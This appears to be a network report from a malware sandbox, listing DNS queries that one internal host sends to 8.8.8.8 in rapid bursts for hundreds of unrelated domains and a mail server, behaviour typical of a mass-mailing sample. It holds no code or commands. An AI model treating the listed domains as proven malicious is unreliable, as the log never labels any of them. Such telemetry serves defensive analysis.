                                                                                                                                                                              Sep 15, 2023 07:28:00.521467924 CEST192.168.2.38.8.8.80xa856Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.527021885 CEST192.168.2.38.8.8.80x459aStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.660048962 CEST192.168.2.38.8.8.80xdc6eStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.667404890 CEST192.168.2.38.8.8.80x5788Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.685573101 CEST192.168.2.38.8.8.80x9fefStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.846669912 CEST192.168.2.38.8.8.80xe85cStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.847316980 CEST192.168.2.38.8.8.80xe929Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.847431898 CEST192.168.2.38.8.8.80xb3d3Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.893295050 CEST192.168.2.38.8.8.80x231aStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.893397093 CEST192.168.2.38.8.8.80x4b03Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.893727064 CEST192.168.2.38.8.8.80xe584Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.893951893 CEST192.168.2.38.8.8.80x6330Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.950340986 CEST192.168.2.38.8.8.80x251fStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.048999071 CEST192.168.2.38.8.8.80xe5e1Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.238157034 CEST192.168.2.38.8.8.80x173Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.277558088 CEST192.168.2.38.8.8.80xb20eStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.284670115 CEST192.168.2.38.8.8.80xb02dStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.336040020 CEST192.168.2.38.8.8.80xfd85Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.338203907 CEST192.168.2.38.8.8.80x5ab0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.453665018 CEST192.168.2.38.8.8.80x4e92Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.494460106 CEST192.168.2.38.8.8.80xcfe9Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.632164001 CEST192.168.2.38.8.8.80xaf1Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.657917976 CEST192.168.2.38.8.8.80xcdd4Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.731709957 CEST192.168.2.38.8.8.80x9503Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.757926941 CEST192.168.2.38.8.8.80x2d4cStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.791980982 CEST192.168.2.38.8.8.80xee05Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.839791059 CEST192.168.2.38.8.8.80x66a1Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.858129025 CEST192.168.2.38.8.8.80x57e8Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.889906883 CEST192.168.2.38.8.8.80xfe5fStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.984833956 CEST192.168.2.38.8.8.80x6b80Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.020840883 CEST192.168.2.38.8.8.80xb6e7Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.089096069 CEST192.168.2.38.8.8.80xe024Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.152210951 CEST192.168.2.38.8.8.80xbea9Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.190386057 CEST192.168.2.38.8.8.80xd66cStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.198678970 CEST192.168.2.38.8.8.80x152Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.244040012 CEST192.168.2.38.8.8.80x173Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.264468908 CEST192.168.2.38.8.8.80x775cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.277533054 CEST192.168.2.38.8.8.80x5c86Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.330363035 CEST192.168.2.38.8.8.80x1262Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.383330107 CEST192.168.2.38.8.8.80x1ac4Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.392059088 CEST192.168.2.38.8.8.80x38deStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.421706915 CEST192.168.2.38.8.8.80x7f3cStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.436599970 CEST192.168.2.38.8.8.80xaa6bStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.438251972 CEST192.168.2.38.8.8.80xd8Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.589337111 CEST192.168.2.38.8.8.80x2679Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.603318930 CEST192.168.2.38.8.8.80x5ca9Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.623169899 CEST192.168.2.38.8.8.80x90b1Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.626859903 CEST192.168.2.38.8.8.80x6281Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.766781092 CEST192.168.2.38.8.8.80x5f06Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.964371920 CEST192.168.2.38.8.8.80x8999Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.019212008 CEST192.168.2.38.8.8.80x6010Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.066484928 CEST192.168.2.38.8.8.80x8a9cStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.123173952 CEST192.168.2.38.8.8.80x6472Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.171329021 CEST192.168.2.38.8.8.80x602aStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.235200882 CEST192.168.2.38.8.8.80x7ec5Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.250363111 CEST192.168.2.38.8.8.80xffd5Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.291466951 CEST192.168.2.38.8.8.80xb20eStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.353239059 CEST192.168.2.38.8.8.80x5ab0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.436148882 CEST192.168.2.38.8.8.80x9ff2Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.654556036 CEST192.168.2.38.8.8.80x4a01Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.656306982 CEST192.168.2.38.8.8.80x368bStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.668803930 CEST192.168.2.38.8.8.80x2f68Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.752803087 CEST192.168.2.38.8.8.80xb27cStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.807485104 CEST192.168.2.38.8.8.80x5fa0Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.807749987 CEST192.168.2.38.8.8.80xc9b3Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.838483095 CEST192.168.2.38.8.8.80x9b27Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.874856949 CEST192.168.2.38.8.8.80xa770Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.909446955 CEST192.168.2.38.8.8.80x3138Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.951190948 CEST192.168.2.38.8.8.80xdecdStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.994546890 CEST192.168.2.38.8.8.80xb9fcStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.003979921 CEST192.168.2.38.8.8.80xdabbStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.014342070 CEST192.168.2.38.8.8.80xdf58Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.044481993 CEST192.168.2.38.8.8.80xfea2Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.167540073 CEST192.168.2.38.8.8.80x2836Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.201577902 CEST192.168.2.38.8.8.80xa99fStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.291815996 CEST192.168.2.38.8.8.80x8fe8Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.292134047 CEST192.168.2.38.8.8.80x616eStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.295125008 CEST192.168.2.38.8.8.80x2e3Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.322793961 CEST192.168.2.38.8.8.80xf2eStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.419841051 CEST192.168.2.38.8.8.80x5548Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.450742960 CEST192.168.2.38.8.8.80x5f5eStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.452238083 CEST192.168.2.38.8.8.80x8d5aStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.480180025 CEST192.168.2.38.8.8.80x1d37Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.517046928 CEST192.168.2.38.8.8.80x48d4Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.552763939 CEST192.168.2.38.8.8.80x46f3Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.579027891 CEST192.168.2.38.8.8.80xe6Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.676914930 CEST192.168.2.38.8.8.80x8a29Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.732969046 CEST192.168.2.38.8.8.80xd7f3Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.733002901 CEST192.168.2.38.8.8.80x1313Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.739258051 CEST192.168.2.38.8.8.80x9c83Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.744637966 CEST192.168.2.38.8.8.80xf064Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.757883072 CEST192.168.2.38.8.8.80xd57aStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.776854992 CEST192.168.2.38.8.8.80xa25fStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.831756115 CEST192.168.2.38.8.8.80x57cStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.884526968 CEST192.168.2.38.8.8.80xa770Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.932502985 CEST192.168.2.38.8.8.80x41d8Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.967426062 CEST192.168.2.38.8.8.80x26Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.967426062 CEST192.168.2.38.8.8.80x81cfStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.090136051 CEST192.168.2.38.8.8.80x2a6cStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.154553890 CEST192.168.2.38.8.8.80x31abStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.232150078 CEST192.168.2.38.8.8.80x2157Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.234741926 CEST192.168.2.38.8.8.80x7135Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.246365070 CEST192.168.2.38.8.8.80xe4baStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.310048103 CEST192.168.2.38.8.8.80x31bcStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.322870970 CEST192.168.2.38.8.8.80x5b7Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.356991053 CEST192.168.2.38.8.8.80xf00fStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.409323931 CEST192.168.2.38.8.8.80xe949Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.471256018 CEST192.168.2.38.8.8.80x5373Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.512152910 CEST192.168.2.38.8.8.80x6482Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.513540983 CEST192.168.2.38.8.8.80xe9a6Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.527484894 CEST192.168.2.38.8.8.80xe94Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.542206049 CEST192.168.2.38.8.8.80xd5d8Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.610843897 CEST192.168.2.38.8.8.80x958Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.639826059 CEST192.168.2.38.8.8.80x1021Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.650984049 CEST192.168.2.38.8.8.80x2734Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.666517019 CEST192.168.2.38.8.8.80x2b42Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.684320927 CEST192.168.2.38.8.8.80x57e5Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.697700024 CEST192.168.2.38.8.8.80x97faStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.712806940 CEST192.168.2.38.8.8.80xe47bStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.719855070 CEST192.168.2.38.8.8.80x9899Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.743894100 CEST192.168.2.38.8.8.80xd7f3Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.760381937 CEST192.168.2.38.8.8.80xf395Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.767290115 CEST192.168.2.38.8.8.80xa66Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.800961018 CEST192.168.2.38.8.8.80x4d37Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.844616890 CEST192.168.2.38.8.8.80xec45Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.151424885 CEST192.168.2.38.8.8.80xa245Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.244782925 CEST192.168.2.38.8.8.80xf7b3Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.291460991 CEST192.168.2.38.8.8.80xe3f8Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.299746990 CEST192.168.2.38.8.8.80x616bStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.373385906 CEST192.168.2.38.8.8.80xc9eStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.418411016 CEST192.168.2.38.8.8.80x91f7Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.510409117 CEST192.168.2.38.8.8.80xffbdStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.544584036 CEST192.168.2.38.8.8.80xaa80Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.620151043 CEST192.168.2.38.8.8.80xe373Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.622653008 CEST192.168.2.38.8.8.80x7122Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.637655973 CEST192.168.2.38.8.8.80x4b7bStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.650805950 CEST192.168.2.38.8.8.80xbfebStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.685384989 CEST192.168.2.38.8.8.80xe245Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.713674068 CEST192.168.2.38.8.8.80xba59Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.719253063 CEST192.168.2.38.8.8.80x2700Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.759660006 CEST192.168.2.38.8.8.80xd7f3Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.791738033 CEST192.168.2.38.8.8.80x233eStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.808140993 CEST192.168.2.38.8.8.80xe4a4Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.814021111 CEST192.168.2.38.8.8.80xbfffStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.817790985 CEST192.168.2.38.8.8.80x3ed4Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.856204987 CEST192.168.2.38.8.8.80xa31cStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.024151087 CEST192.168.2.38.8.8.80x42a6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.024983883 CEST192.168.2.38.8.8.80x2c26Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.033514977 CEST192.168.2.38.8.8.80xf981Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.044151068 CEST192.168.2.38.8.8.80x7266Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.108143091 CEST192.168.2.38.8.8.80xacaStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.204902887 CEST192.168.2.38.8.8.80x3169Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.208153009 CEST192.168.2.38.8.8.80x9892Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.260512114 CEST192.168.2.38.8.8.80x6f4aStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.322822094 CEST192.168.2.38.8.8.80x8580Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.362165928 CEST192.168.2.38.8.8.80x9229Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.560564041 CEST192.168.2.38.8.8.80x4972Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.684762955 CEST192.168.2.38.8.8.80x18acStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.857114077 CEST192.168.2.38.8.8.80xf814Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.932874918 CEST192.168.2.38.8.8.80xa48fStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.091314077 CEST192.168.2.38.8.8.80xce87Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.167340994 CEST192.168.2.38.8.8.80x3f8bStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.322038889 CEST192.168.2.38.8.8.80x8580Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.499741077 CEST192.168.2.38.8.8.80x518cStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.545639038 CEST192.168.2.38.8.8.80x2dcaStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.560511112 CEST192.168.2.38.8.8.80x6742Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.653203011 CEST192.168.2.38.8.8.80x652fStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.683768988 CEST192.168.2.38.8.8.80xa283Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.825316906 CEST192.168.2.38.8.8.80x97e0Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.950195074 CEST192.168.2.38.8.8.80x2a18Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.995739937 CEST192.168.2.38.8.8.80x98fcStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.017864943 CEST192.168.2.38.8.8.80x5d64Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.088701010 CEST192.168.2.38.8.8.80x39d1Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.184276104 CEST192.168.2.38.8.8.80x3fbcStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.325989962 CEST192.168.2.38.8.8.80x9f8dStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.369663000 CEST192.168.2.38.8.8.80x10a6Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.387254000 CEST192.168.2.38.8.8.80x5c03Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.395355940 CEST192.168.2.38.8.8.80x182aStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.452138901 CEST192.168.2.38.8.8.80xb6fdStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.486761093 CEST192.168.2.38.8.8.80x6e11Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.488136053 CEST192.168.2.38.8.8.80x3d8dStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.541692019 CEST192.168.2.38.8.8.80x6385Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.585284948 CEST192.168.2.38.8.8.80x776Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.588882923 CEST192.168.2.38.8.8.80x2324Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.588882923 CEST192.168.2.38.8.8.80xf693Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.744893074 CEST192.168.2.38.8.8.80x2e6Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.926882029 CEST192.168.2.38.8.8.80xaa41Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
